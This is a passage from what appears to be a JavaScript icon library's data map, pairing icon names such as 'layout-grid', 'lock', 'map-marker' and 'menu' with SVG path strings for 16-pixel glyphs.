2-2s-.9-2-2-2-2 .9-2 2c0 .55.22 1.04.58 1.4l-1.01 1.69C11.38 6.04 11.2 6 11 6c-.93 0-1.71.64-1.93 1.5H6.93C6.71 6.64 5.93 6 5 6c-.2 0-.38.04-.56.09L3.42 4.4C3.78 4.04 4 3.55 4 3c0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.2 0 .38-.04.56-.09L3.58 6.6C3.22 6.96 3 7.45 3 8c0 .55.22 1.04.58 1.4l-1.01 1.69C2.38 11.04 2.2 11 2 11c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2c0-.55-.22-1.04-.58-1.4l1.01-1.69c.19.05.37.09.57.09.93 0 1.71-.64 1.93-1.5h2.14c.22.86 1 1.5 1.93 1.5.2 0 .38-.04.56-.09l1.01 1.69c-.35.36-.57.85-.57 1.4 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2z"],"layout-circle":["M14.16 6.02c-.12-.36-.26-.7-.43-1.03.17-.29.27-.63.27-.99 0-1.1-.9-2-2-2-.36 0-.7.1-.99.27-.33-.17-.67-.31-1.03-.43A1.987 1.987 0 0 0 8 0C6.95 0 6.1.81 6.02 1.84c-.36.12-.7.26-1.03.43C4.7 2.1 4.36 2 4 2c-1.1 0-2 .9-2 2 0 .36.1.7.27.99-.17.33-.31.67-.43 1.03C.81 6.1 0 6.95 0 8c0 1.05.81 1.9 1.84 1.98.12.36.26.7.43 1.03-.17.29-.27.63-.27.99 0 1.1.9 2 2 2 .36 0 .7-.1.99-.27.33.17.67.32 1.03.43C6.1 15.19 6.95 16 8 16c1.05 0 1.9-.81 1.98-1.84.36-.12.7-.26 1.03-.43.29.17.63.27.99.27 1.1 0 2-.9 2-2 0-.36-.1-.7-.27-.99.17-.33.31-.67.43-1.03C15.19 9.9 16 9.05 16 8c0-1.05-.81-1.9-1.84-1.98zm-.99 3.79c-.05.16-.11.31-.17.46-.3-.17-.64-.27-1-.27-1.1 0-2 .9-2 2 0 .36.1.7.27 1-.15.07-.3.12-.46.17C9.5 12.48 8.81 12 8 12s-1.5.48-1.81 1.17c-.16-.06-.32-.11-.46-.17.17-.3.27-.64.27-1 0-1.1-.9-2-2-2-.36 0-.7.1-1 .27-.07-.15-.12-.3-.17-.46C3.52 9.5 4 8.81 4 8s-.48-1.5-1.17-1.81c.06-.16.11-.32.17-.46.3.17.64.27 1 .27 1.1 0 2-.9 2-2 0-.36-.1-.7-.27-1 .15-.07.3-.12.46-.17C6.5 3.52 7.19 4 8 4s1.5-.48 1.81-1.17c.16.06.32.11.46.17-.17.3-.27.64-.27 1 0 1.1.9 2 2 2 .36 0 .7-.1 1-.27.07.15.12.3.17.46C12.48 6.5 12 7.19 12 8s.48 1.5 1.17 1.81z"],"layout-grid":["M2 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-6C.9 6 0 6.9 0 8s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-6C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm12 4c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM8 0C6.9 0 6 .9 6 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM8 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"layout-group-by":["M2 6C.9 6 0 6.9 0 8s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 5c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm12-7c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zM2 1C.9 1 0 1.9 0 3s.9 2 2 2 2-.9 2-2-.9-2-2-2zm7 8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm5 3c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"layout-hierarchy":["M14.5 12.07V9.93c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2-.93 0-1.71.64-1.93 1.5H9.93c-.18-.7-.73-1.25-1.43-1.43V3.93c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S6 .9 6 2c0 .93.64 1.71 1.5 1.93v2.14c-.7.18-1.25.73-1.43 1.43H3.93C3.71 6.64 2.93 6 2 6 .9 6 0 6.9 0 8c0 .93.64 1.71 1.5 1.93v2.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93V9.93c.7-.18 1.25-.73 1.43-1.43h2.14c.18.7.73 1.25 1.43 1.43v2.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93V9.93c.7-.18 1.25-.73 1.43-1.43h2.14c.18.7.73 1.25 1.43 1.43v2.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93z"],"layout-linear":["M14 6c-.93 0-1.71.64-1.93 1.5H9.93C9.71 6.64 8.93 6 8 6s-1.71.64-1.93 1.5H3.93C3.71 6.64 2.93 6 2 6 .9 6 0 6.9 0 8s.9 2 2 2c.93 0 1.71-.64 1.93-1.5h2.13C6.29 9.36 7.07 10 8 10s1.71-.64 1.93-1.5h2.13c.22.86 1 1.5 1.93 1.5 1.1 0 2-.9 2-2C16 6.9 15.1 6 14 6z"],"layout-skew-grid":["M2 6C.9 6 0 6.9 0 8s.9 2 2 2 2-.9 2-2-.9-2-2-2zm12-2c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zM2 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM2 0C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6 9c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6-3c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM8 3c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6 9c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"layout-sorted-clusters":["M2 6C.9 6 0 6.9 0 8s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM2 0C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm12 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM8 9c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"left-join":["M6.6 3.3C6.1 3.1 5.6 3 5 3 2.2 3 0 5.2 0 8s2.2 5 5 5c.6 0 1.1-.1 1.6-.3C5.3 11.6 4.5 9.9 4.5 8s.8-3.6 2.1-4.7zM8 4c-1.2.9-2 2.4-2 4s.8 3.1 2 4c1.2-.9 2-2.3 2-4s-.8-3.1-2-4zm3-1c2.8 0 5 2.2 5 5s-2.2 5-5 5c-.6 0-1.1-.1-1.6-.3 1.3-1.1 2.1-2.9 2.1-4.7s-.8-3.5-2.1-4.7c.5-.2 1-.3 1.6-.3zm.35 1.02c.73 1.15 1.14 2.52 1.14 3.98s-.42 2.83-1.14 3.98c2.04-.18 3.64-1.9 3.64-3.98s-1.6-3.8-3.64-3.98z"],lifesaver:["M9.405 11.746C8.968 11.91 8.495 12 8 12c-.494 0-.968-.09-1.405-.254l-.702 1.873C6.548 13.865 7.258 14 8 14c.742 0 1.452-.135 2.107-.38l-.702-1.874zm2.341-2.341l1.873.702C13.865 9.452 14 8.742 14 8c0-.742-.135-1.452-.38-2.107l-1.874.702c.164.437.254.91.254 1.405 0 .494-.09.968-.254 1.405zM9.405 4.254l.702-1.873A5.987 5.987 0 0 0 8 2c-.742 0-1.452.135-2.107.38l.702 1.874C7.032 4.09 7.505 4 8 4c.494 0 .968.09 1.405.254zM4.254 6.595L2.38 5.893A5.987 5.987 0 0 0 2 8c0 .742.135 1.452.38 2.107l1.874-.702A3.991 3.991 0 0 1 4 8c0-.494.09-.968.254-1.405zM8 16A8 8 0 1 1 8 0a8 8 0 0 1 0 16zm0-6a2 2 0 1 0 0-4 2 2 0 0 0 0 4z"],lightbulb:["M9.01 14h-2c-.55 0-1 .45-1 1s.45 1 1 1h2c.55 0 1-.45 1-1s-.44-1-1-1zm1-3h-4c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1s-.44-1-1-1zm-2-11C5.26 0 3.03 1.95 3.03 4.35c0 2.37 1.63 2.64 1.94 5.22 0 .24.22.44.5.44h5.09c.28 0 .5-.19.5-.44C11.37 6.99 13 6.72 13 4.35 13 1.95 10.77 0 8.01 0z"],link:["M4.99 11.99c.28 0 .53-.11.71-.29l6-6a1.003 1.003 0 0 0-1.42-1.42l-6 6a1.003 1.003 0 0 0 .71 1.71zm3.85-2.02L6.4 12.41l-1 1-.01-.01c-.36.36-.85.6-1.4.6-1.1 0-2-.9-2-2 0-.55.24-1.04.6-1.4l-.01-.01 1-1 2.44-2.44c-.33-.1-.67-.16-1.03-.16-1.1 0-2.09.46-2.81 1.19l-.02-.02-1 1 .02.02c-.73.72-1.19 1.71-1.19 2.81 0 2.21 1.79 4 4 4 1.1 0 2.09-.46 2.81-1.19l.02.02 1-1-.02-.02c.73-.72 1.19-1.71 1.19-2.81 0-.35-.06-.69-.15-1.02zm7.15-5.98c0-2.21-1.79-4-4-4-1.1 0-2.09.46-2.81 1.19l-.02-.02-1 1 .02.02c-.72.72-1.19 1.71-1.19 2.81 0 .36.06.69.15 1.02l2.44-2.44 1-1 .01.01c.36-.36.85-.6 1.4-.6 1.1 0 2 .9 2 2 0 .55-.24 1.04-.6 1.4l.01.01-1 1-2.43 2.45c.33.09.67.15 1.02.15 1.1 0 2.09-.46 2.81-1.19l.02.02 1-1-.02-.02a3.92 3.92 0 0 0 1.19-2.81z"],list:["M1 3h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 10H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"list-columns":["M6 1c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1s.45-1 1-1h5zm9-12c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1h5zm0 4c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1h5z"],"list-detail-view":["M6 9H1c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm0 4H1c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm9-12h-5c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM6 5H1c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H1c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1z"],locate:["M15 7h-.09A6.98 6.98 0 0 0 9 1.1V1c0-.55-.45-1-1-1S7 .45 7 1v.09A6.98 6.98 0 0 0 1.1 7H1c-.55 0-1 .45-1 1s.45 1 1 1h.1A6.969 6.969 0 0 0 7 14.91V15c0 .55.45 1 1 1s1-.45 1-1v-.09A6.98 6.98 0 0 0 14.9 9h.1c.55 0 1-.45 1-1s-.45-1-1-1zm-6.02 5.9c-.05-.5-.46-.9-.98-.9s-.93.4-.98.9A5.017 5.017 0 0 1 3.1 8.98c.5-.05.9-.46.9-.98s-.4-.93-.9-.98A5.017 5.017 0 0 1 7.02 3.1c.05.5.46.9.98.9s.93-.4.98-.9c1.97.39 3.52 1.95 3.92 3.92-.5.05-.9.46-.9.98s.4.93.9.98a5.017 5.017 0 0 1-3.92 3.92zM8 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],lock:["M13.96 7H12V3.95C12 1.77 10.21 0 8 0S4 1.77 4 3.95V7H1.96c-.55 0-.96.35-.96.9v6.91c0 .54.41 1.19.96 1.19h12c.55 0 1.04-.65 1.04-1.19V7.9c0-.55-.49-.9-1.04-.9zM6 7V3.95c0-1.09.9-1.97 2-1.97s2 .88 2 1.97V7H6z"],"log-in":["M11 8c0-.28-.11-.53-.29-.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L7.59 7H1c-.55 0-1 .45-1 1s.45 1 1 1h6.59L6.3 10.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71zm4-8H9c-.55 0-1 .45-1 1s.45 1 1 1h5v12H9c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"log-out":["M7 14H2V2h5c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1zm8.71-6.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L12.59 7H6c-.55 0-1 .45-1 1s.45 1 1 1h6.59l-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],manual:["M15.99 1.13c-.02-.41-.33-.77-.78-.87C12.26-.36 9.84.13 8 1.7 6.16.13 3.74-.36.78.26.33.35.03.72.01 1.13H0v12c0 .08 0 .17.02.26.12.51.65.82 1.19.71 2.63-.55 4.59-.04 6.01 1.57.02.03.06.04.08.06.02.02.03.04.05.06.04.03.09.04.13.07.05.03.09.05.14.07.11.04.23.07.35.07h.04c.12 0 .24-.03.35-.07.05-.02.09-.05.14-.07.04-.02.09-.04.13-.07.02-.02.03-.04.05-.06.03-.02.06-.03.08-.06 1.42-1.6 3.39-2.12 6.01-1.57.54.11 1.07-.21 1.19-.71.04-.09.04-.18.04-.26l-.01-12zM7 12.99c-1.4-.83-3.07-1.14-5-.93V1.96c2.11-.28 3.75.2 5 1.46v9.57zm7-.92c-1.93-.21-3.6.1-5 .93V3.42c1.25-1.26 2.89-1.74 5-1.46v10.11z"],"manually-entered-data":["M1 8h3.76l2-2H1c-.55 0-1 .45-1 1s.45 1 1 1zm14.49-4.01c.31-.32.51-.76.51-1.24C16 1.78 15.22 1 14.25 1c-.48 0-.92.2-1.24.51l-1.44 1.44 2.47 2.47 1.45-1.43zM1 4h7.76l2-2H1c-.55 0-1 .45-1 1s.45 1 1 1zm0 6c-.55 0-1 .45-1 1 0 .48.35.86.8.96L2.76 10H1zm9.95-6.43l-6.69 6.69 2.47 2.47 6.69-6.69-2.47-2.47zm4.25 2.47L13.24 8H15c.55 0 1-.45 1-1 0-.48-.35-.86-.8-.96zM2 15l3.86-1.39-2.46-2.44L2 15zm13-5h-3.76l-2 2H15c.55 0 1-.45 1-1s-.45-1-1-1z"],map:["M15.55 3.17l-4.49-3A.975.975 0 0 0 9.99.15L5.53 2.82 1.56.17A1.003 1.003 0 0 0 0 1v11c0 .35.18.65.45.83l4.49 3a.975.975 0 0 0 1.07.02l4.46-2.67 3.97 2.65A1.003 1.003 0 0 0 16 15V4c0-.35-.18-.65-.45-.83zM5 13.46l-3-2v-8.6l2.94 1.96c.02.02.04.03.06.04v8.6zm5-2.32s-.01 0-.01.01L6 13.53V4.86s.01 0 .01-.01L10 2.47v8.67zm4 1.99l-2.94-1.96c-.02-.01-.04-.02-.05-.03v-8.6l3 2v8.59z"],"map-create":["M14 6.82v6.32l-2.94-1.96c-.02-.01-.04-.02-.05-.03V6.22c-.08-.07-.15-.16-.22-.24-.28-.02-.54-.08-.79-.16v5.32s-.01 0-.01.01L6 13.53V4.86s.01 0 .01-.01l2.05-1.23C8.02 3.42 8 3.21 8 3c0-.98.47-1.84 1.2-2.39l-3.67 2.2L1.56.17A1.003 1.003 0 0 0 0 1v11c0 .35.18.65.45.83l4.49 3a.975.975 0 0 0 1.07.02l4.46-2.67 3.97 2.65A1.003 1.003 0 0 0 16 15V5.82c-.25.09-.52.14-.8.16-.33.36-.73.67-1.2.84zm-9 6.64l-3-2v-8.6l2.94 1.96c.02.02.04.03.06.04v8.6zM11 4h1v1c0 .55.45 1 1 1s1-.45 1-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1z"],"map-marker":["M8.46 0C5.42 0 2.95 2.39 2.95 5.33 2.95 8.28 8.46 16 8.46 16s5.51-7.72 5.51-10.67C13.96 2.39 11.5 0 8.46 0zm0 8a2.5 2.5 0 0 1 0-5 2.5 2.5 0 0 1 0 5z"],maximize:["M5.99 8.99c-.28 0-.53.11-.71.29l-3.29 3.29v-1.59c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H3.41L6.7 10.7a1.003 1.003 0 0 0-.71-1.71zm9-9h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59l-3.3 3.3a.99.99 0 0 0-.29.7 1.003 1.003 0 0 0 1.71.71l3.29-3.29V5c0 .55.45 1 1 1s1-.45 1-1V1c0-.56-.45-1.01-1-1.01z"],media:["M11.99 6.99c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zm3-5h-14c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-10c0-.55-.45-1-1-1zm-1 9l-5-3-1 2-3-4-3 5v-7h12v7z"],menu:["M1 4h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 8H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm0-5H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"menu-closed":["M14.99 6.99h-9c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zm-12-2c-.28 0-.53.11-.71.29l-2 2a1.014 1.014 0 0 0 0 1.42l2 2a1.003 1.003 0 0 0 1.71-.71v-4c0-.55-.45-1-1-1zm3-1h9c.55 0 1-.45 1-1s-.45-1-1-1h-9c-.55 0-1 .45-1 1s.45 1 1 1zm9 8h-9c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1z"],"menu-open":["M9.99 11.99h-9c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zm0-5h-9c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zm0-5h-9c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zm5.71 5.3l-2-2a1.003 1.003 0 0 0-1.71.71v4a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71s-.11-.53-.29-.71z"],"merge-columns":["M5.71 5.29a1.003 1.003 0 0 0-1.42 1.42l.3.29H2V2h3v1.51c.52.06.99.29 1.34.65l.66.66V1c0-.55-.45-1-1-1H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-3.82l-.66.66c-.35.35-.82.59-1.34.65V14H2V9h2.59l-.3.29a1.003 1.003 0 0 0 1.42 1.42l2-2C7.89 8.53 8 8.28 8 8c0-.28-.11-.53-.29-.71l-2-2zM15 0h-5c-.55 0-1 .45-1 1v3.82l.66-.66c.35-.35.82-.59 1.34-.65V2h3v5h-2.59l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C8.11 7.47 8 7.72 8 8c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H14v5h-3v-1.51c-.52-.06-.99-.29-1.34-.65L9 11.18V15c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"merge-links":["M8 7c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0 4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0-8c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm6 3c-.93 0-1.71.64-1.93 1.5H11V3c0-1.66-1.34-3-3-3S5 1.34 5 3v4.5H3.93C3.71 6.64 2.93 6 2 6 .9 6 0 6.9 0 8s.9 2 2 2c.93 0 1.71-.64 1.93-1.5H5V13c0 1.66 1.34 3 3 3s3-1.34 3-3V8.5h1.07c.22.86 1 1.5 1.93 1.5 1.1 0 2-.9 2-2s-.9-2-2-2zm-4 7c0 1.1-.9 2-2 2s-2-.9-2-2V3c0-1.1.9-2 2-2s2 .9 2 2v10z"],minimize:["M15.99.99a1.003 1.003 0 0 0-1.71-.71l-3.29 3.29V1.99c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H12.4l3.3-3.29c.18-.18.29-.43.29-.71zm-10 8h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59L.29 14.28a1.003 1.003 0 0 0 1.42 1.42L5 12.41V14c0 .55.45 1 1 1s1-.45 1-1v-4a1.02 1.02 0 0 0-1.01-1.01z"],minus:["M13 7H3c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1z"],"mobile-phone":["M12 0H4c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h8c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM8 15c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm3-3H5V3h6v9z"],"mobile-video":["M15 4c-.28 0-.53.11-.71.29L12 6.59V4c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V9.41l2.29 2.29c.18.19.43.3.71.3.55 0 1-.45 1-1V5c0-.55-.45-1-1-1z"],moon:["M15 11.38A7.835 7.835 0 0 1 7.85 16C3.51 16 0 12.49 0 8.15 0 4.97 1.89 2.23 4.62 1c-.45.99-.7 2.08-.7 3.23a7.85 7.85 0 0 0 7.85 7.85c1.15 0 2.24-.25 3.23-.7z"],more:["M2 6.03a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM14 6.03a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM8 6.03a2 2 0 1 0 0 4 2 2 0 1 0 0-4z"],mountain:["M16 13H3l6-9h1l2 2h1l3 7zm-2.5-3.5l-1-2.5h-1l-2-2-3 4.5L9 8l1 1 1-1 2.5 1.5zM5.94 7l-4.122 6H0l5-6h.94z"],move:["M15.71 7.29l-2-2a1.003 1.003 0 0 0-1.42 1.42l.3.29H9V3.41l.29.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-2-2C8.53.11 8.28 0 8 0s-.53.11-.71.29l-2 2a1.003 1.003 0 0 0 1.42 1.42l.29-.3V7H3.41l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C.11 7.47 0 7.72 0 8c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L3.41 9H7v3.59l-.29-.29A.965.965 0 0 0 6 12a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2a1.003 1.003 0 0 0-1.42-1.42l-.29.3V9h3.59l-.29.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],mugshot:["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14h-.15c-.03-.09-.04-.16-.08-.25-.34-.79-2.01-1.31-3.12-1.8-1.11-.49-.96-.79-1-1.2-.01-.06-.01-.12-.01-.18.38-.34.69-.8.89-1.33 0 0 .01-.03.01-.04.04-.12.08-.24.11-.36.25-.05.4-.33.46-.59.06-.1.18-.36.15-.65-.04-.37-.19-.55-.35-.62v-.06c0-.48-.04-1.16-.13-1.61-.02-.12-.05-.25-.08-.37-.16-.55-.51-1.05-.96-1.39C9.26 3.19 8.6 3 8 3c-.59 0-1.26.19-1.73.55-.45.35-.8.84-.96 1.39-.04.13-.06.25-.08.38-.09.45-.13 1.13-.13 1.61v.06c-.18.06-.33.24-.37.62-.03.29.09.54.15.65.06.26.21.54.47.59.03.12.07.25.11.36 0 .01.01.02.01.02v.01c.21.54.53 1.01.92 1.35 0 .05-.01.11-.01.16-.04.41.08.7-1.03 1.2-1.11.49-2.77 1.01-3.12 1.8-.04.09-.05.16-.08.25H2V2h12v12z"],"multi-select":["M12 3.98H4c-.55 0-1 .45-1 1v1h8v5h1c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1zm3-3H7c-.55 0-1 .45-1 1v1h8v5h1c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1zm-6 6H1c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1h8c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1zm-1 5H2v-3h6v3z"],music:["M15 0c-.07 0-.13.03-.19.04V.02l-10 2v.02C4.35 2.13 4 2.52 4 3v9.12c-.31-.07-.65-.12-1-.12-1.66 0-3 .9-3 2s1.34 2 3 2 3-.9 3-2V6.32l8-1.6v5.4c-.31-.07-.65-.12-1-.12-1.66 0-3 .9-3 2s1.34 2 3 2 3-.9 3-2V1c0-.55-.45-1-1-1z"],"new-grid-item":["M6 0H1C.45 0 0 .45 0 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm5 14c0-.55-.45-1-1-1s-1 .45-1 1v1c0 .55.45 1 1 1h1c.55 0 1-.45 1-1s-.45-1-1-1zM6 9H1c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1zm9 4c-.55 0-1 .45-1 1-.55 0-1 .45-1 1s.45 1 1 1h1c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm-4-4h-1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1s1-.45 1-1c.55 0 1-.45 1-1s-.45-1-1-1zm4-9h-5c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm0 9h-1c-.55 0-1 .45-1 1s.45 1 1 1c0 .55.45 1 1 1s1-.45 1-1v-1c0-.55-.45-1-1-1z"],"new-link":["M15 3h-1V2c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V5h1c.55 0 1-.45 1-1s-.45-1-1-1zm-3.5 6a2.5 2.5 0 0 0-2.45 2h-4.1a2.5 2.5 0 1 0 0 1h4.1a2.5 2.5 0 1 0 2.45-3z"],"new-object":["M8 4c0 .6.4 1 1 1h2v2c0 .6.4 1 1 1s1-.4 1-1V5h2c.6 0 1-.4 1-1s-.4-1-1-1h-2V1c0-.6-.4-1-1-1s-1 .4-1 1v2H9c-.6 0-1 .5-1 1zm6.5 2.5V7c0 1.4-1.1 2.5-2.5 2.5S9.5 8.4 9.5 7v-.5H9C7.6 6.5 6.5 5.4 6.5 4S7.6 1.5 9 1.5h.5V1c0-.3.1-.6.1-.8C9.1.1 8.6 0 8 0 3.6 0 0 3.6 0 8s3.6 8 8 8 8-3.6 8-8c0-.6-.1-1.3-.2-1.9-.4.3-.8.4-1.3.4z"],"new-person":["M9.12 12.69c-1.17-.53-1.01-.85-1.05-1.29-.01-.06-.01-.12-.01-.19.4-.37.73-.87.94-1.44 0 0 